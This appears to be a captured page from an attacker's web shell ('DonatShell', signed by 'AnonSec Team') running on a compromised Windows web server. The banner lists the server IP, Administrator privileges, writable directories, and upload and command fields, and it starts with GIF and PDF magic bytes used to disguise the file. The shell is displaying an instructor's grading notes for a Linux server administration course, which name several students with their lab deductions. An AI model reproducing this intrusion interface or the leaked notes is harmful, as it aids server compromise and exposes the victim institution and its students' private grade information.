GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/Classes/CST2608/Labs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/Classes/CST2608/Labs/Grade notes.txt
-0 Work submitted incorrectly.
   All of your screenshots were jpg image files with a .png extension. They were not png image files.
   Points will be deducted in the future.

-0 Work submitted incorrectly.
   All of your screenshots were jpg image files with a .jpg extension. They were not png image files.
   Points will be deducted in the future.

Lab 1
-0 Work submitted incorrectly.
   Your screenshots were not contained in a Lab01 folder as required.
   Points will be deducted in the future.
-0 Work submitted incorrectly.
   Your Lab01 folder was mis-named `Lab1`.
   Points will be deducted in the future.
-0 Work submitted incorrectly.
   Your screenshots were incorrectly named.
   Points will be deducted in the future.
-0 Work submitted incorrectly.
   Your CST2608-Lab01a-JohnWages.png screenshot was misnamed.
   Points will be deducted in the future.

-0 Your CST2608-Lab01b-StudentName.png screenshot does not show the login screen as requested, it does, however, prove that the desktop was installed. I will not deduct points for an incorrect screenshot this time.


Lab 2
-0 Work submitted incorrectly.
   You are missing copies of your hostname, hosts, and 50-cloud-init-yaml files in your submission.
   Points will be deducted in the future for this.
-0 Work submitted incorrectly.
   Your screenshot files donot have the .png extension in the name.
   Points will be deducted in the future for this.
-0 Work submitted incorrectly.
   Two of your screenshots are misnamed. They begin with a space.
   Points will be deducted in the future for this.
-1 Your CST2608-Lab02-ping-StudentName.png screenshot was misnamed 'CST2608-Lab02-ping-StudentName'. It did not have an extenstion.

-1 Your CST2608-Lab02-interfaces-StudentName.png and CST2608-Lab02-interfaces-StudentName.png filenames began with a space. So the file names are incorrect.


Lab 3
-1 Your screenshots are misnamed. They do not have the .png extenstion.

Lab 3.5 - Remote Administration
-5 Missing putty screenshot.
   Did you miss steps 1 and 2?


Lab 4 - DNS server

Step 5 dig
-3 Step 5.2; You have not set your Ubuntu server to use itself as the first DNS server.
   DNS entries for your domain will fail to ANSWER until you fix this.
-2 The dig command from step 5 gave an incorrect answer.
   It shows `AUTHORITY: 0`. It should show `AUTHORITY: 1`.
   This is probably because of a problem with your /etc/bind/db.pae.test file.
   
Step 5 reverse dig
-2 Step 5.3; The dig reverse lookup from step 6 gave no answer.
   It shows `ANSWER: 0`. It should show `ANSWER: 1` and `ADDITIONAL: 2`.
   I believe this is because of a problem in your rev.ami.test file.
   On line 10 you have `@       IN      NS      jacric18.`.
   The last . stops your domain from being added to the server name.
   You should change it to `@       IN      NS      jacric18.ric.test.`.
-2 The dig reverse lookup command from step 6 gave an incorrect answer.
   It shows `AUTHORITY: 0`. It should show `AUTHORITY: 1`.
   This is probably because of a problem with your /etc/bind/rev.joh.test file.
-2 The dig command from step 6 gave an incorrect answer.
   From looking at your submitted files I am unsure exactly why.
   It could be that there is no period (.) at the end of line 9 in your .arpa file.
-0 You have an error in your `rev.ran.test` reverse lookup zone file.
   On line 10 you have `@       IN      NS      jasran18.`.
   The last . stops your domain from being added to the server name.
   You should change it to `@       IN      NS      jasran18.ran.test.`.
   Your reverse lookup still works only because you have the additional line 14


Lab 4.5 - DNS Win 10
-1 You did not correctly name your reverse zone. it should be 51.168.192.in-addr.arpa and not ccc.bbb.aaa.in-addr.arpa
   Look at your named.conf.testal file.
-3 Step3; You failed to show that Wewbmin is working for your DNS server.

Step 7 Submit files.
-5 You are missing files from your submission:
   config, db.rie.test, named.conf.testal, named.conf.options, resolv.conf, and rev.rie.test.

Step 2.2; nslookup.
-1 The nslookup does not show your server as the DNS server. It shows `Server: UnKnown'.
   This will probably work when your reverse lookup zone `rev.ric.test` is fixed.

Step 2.3; cst site.
-1 Step 2.3; Your https://cst.mar.test screenshot is not of the https://cst.mar.test browser window.
   It is on the lab page from the cst.ridgewater.edu site.

Step 3 Webmin
-2 Step 3; You submission is missing the CST2608-Lab04.5-Webmin-JustinHerzberg.png screenshot.
-2 It does not appear that Webmin sees your zones and cannot administer them.
   The most likely cause is a setting in your /etc/webmin/bind8/config file.
   We should look at this in class or via a web meeting.
-2 Your CST2608-Lab04-Webmin-StudentName.png from step 9.4 does not show the Existing DNS Zones section as required.

-1 It does not appear that Webmin sees your default zones and cannot administer them.
   The most likely cause is a setting in your /etc/webmin/bind8/config file.
   We should look at this in class or via a web meeting.


Lab 5 - Network sharting with Samba
[homes]
   comment = Home Directories
   browseable = no
   valid users = %S
   writable = yes
   create mask = 0750
   directory mask = 0750
[share]
    comment = Common Share
    path = /srv/samba/share
    browsable = yes
    guest ok = yes
    read only = no
    create mask = 0777
    directory mask = 0777

-0 Work submitted incorrectly.
   Your CST2608-Lab05a-GinoLuciano.png file was misnamed `CST2608-Lab05a-GinoLuciano.png.png`.
   Points will be deducted in the future.
-0 Work submitted incorrectly.
   You misnamed your `Lab05` folder as `lab05`.
   Points will be deducted in the future.

Step 2; Test Samba with name.
Steps 2.1,2.2; server.domain.test share (screenshot a)

Steps 2.3-2-6; name.txt and name-Readonly.txt files (screenshot b)

Steps 2.7,2.8; name-home.txt file (screenshot c)

Step 3; Test Samba as lastname.
Steps 3.1,3.2; lastname share (screenshot d)

Steps 3.3,3.4; lastname.txt file (screenshot e)

Step 3.5; Edit name-Readonly.txt file (screenshot f)

Steps 3.6,3.7; lastname.home.txt file (screenshot g)

Step 4; /srv/samba/share directory (screenshot h)
-1 Step 4; Missing screenshot.
-1 Step 4.3; You did an 'ls -1' command (with a one), not an 'ls -l' command (with the letter l) in step 4.3.
-1 Step 4.4; Your name-Readonly.txt file is not readonly.
   Did you miss step 2.5?

Step 5; Webmin Samba (screenshot w)
-2 Step 5; Missing screenshot.

-0 Your `StudentName-Readonly.txt` file is actually called `travis-Readonly.txt.txt.
   You did not see this because your have extenstions hidden in your Windows VM.


Lab 6 - Web server
-0 You misnamed your `Lab06` folder as `lab06`.
-1 You did not select Apache Webserver in your 3.2 screenshot.
-1 You did not select PHP Configuration in your 4.2 screenshot.
-1 You did not configure PHP with link(s) to the correct PHP configuration files.


Lab 7 FTP server
-0 You should have used the ginluc18.luc.test name instead of the IP address.
-0 You misnamed your `Lab07` folder as `lab07`.
-1 Your files were not in a `Lab07` folder as required`. They were in the root of you zip file.
-1 You did not create the `JackRice.txt` file required by step 1.2.
-1 Step 1.2; You misnamed your `EthanFischer.txt` as `ethanfischer.txt`.
-2 You did not include a copy of the /etc/proftpd/proftpd.conf file as required.
-5 You did not configure the default directory for ftp access as the ftp directory in the users's directory as reqired by step 2.3.
-1 Step 5.4; You entered the wrong host in your ftp config.
   You used `dankre18` instead of the FQDN of `dankre18.mar.test`.
   This only works because you must have a setting in your hosts file.
-1 Step 5.4; You entered the wrong host in your ftp config.
   You used an ip address instead of the FQDN of `hunbju.bju.test`.

Lab 8 Email server
-0 Step 5; Your lname user email address should be lname@dom.test, not lname@firlas18.dom.test.
-0 Step 6; Your fname user email address should be fname@dom.test, not fname@firlas18.dom.test.
-1 Step 6.5 Incorrect screenshot.
-1 Step 8.4 Missing screenshot.
-1 You misnamed your `Lab08` folder as `lab08`.
-1 Missing 10-auth.conf file as required by step 9.1.
-1 Missing 10-logging.conf file as required by step 9.2.
-1 Missing 10-mail.conf file as required by step 9.3.
-2 Missing screenshot CST2608-StudentName-Lab08a.png from step 6.5.
-2 Missing screenshot CST2608-StudentName-Lab08b.png from step 7.5.
-1 Missing screenshot CST2608-StudentName-Lab08c.png from step 8.2.
-1 Missing screenshot CST2608-StudentName-Lab08d.png from step 8.4.
-1 Missing dovecot.conf file as required by step 9.4.
-1 Missing main.cf file as required by step 9.5.
-1 Your CST2608-StudentName-Lab08d.png was incorrect.
   You either took another screenshot of home/jim/Maildir or were logged in as lastname when you took it.
-2 Step 5.4; You sent the email to yourself (hser) and not your second user (moo).
   Step 6 and 7 then need to be redone as well.
-0 Step 6.5.2; Your CST2608-HserMoo-Lab08a.png screenshot is of the first user's mailbox (hser) and not of second (moo).


Lab 9 Install MySQL
-1 Your files were not in a `Lab09` folder as required`. They were in the root of you zip file.
-1 You misnamed your `Lab08` folder as `lab08`.
+1 Because you turned this in before I graded Lab8 I am giving you this point back.
-10 Your screenshot is not of the Webmin MySQL Database Server page.
    You submitted a screenshot of the the Lab 9 page.
=e

Lab 10
-1 Work submitted incorrectly. Your `Lab10` folder was misnamed `lab10`.
-1 Your CST2608-Lab10-StudentName.png screenshot was a jpg image file with a .png extension.
   I require all screenshots to be in png image format.


Lab 11


Lab 12
-1 Work submitted incorrectly.
   Your files were not in a `Lab12` folder, they were in the root of the zip file.
-10 Your server is not upgraded to version 22.04 or this is an old screenshot.
    Did you do the `sudo do-release-upgrade`?
=e
-10 Your server is not upgraded to version 22.04 or this is an old screenshot.
    Did the `sudo do-release-upgrade` actually work?
=e

Anon7 - 2022
AnonSec Team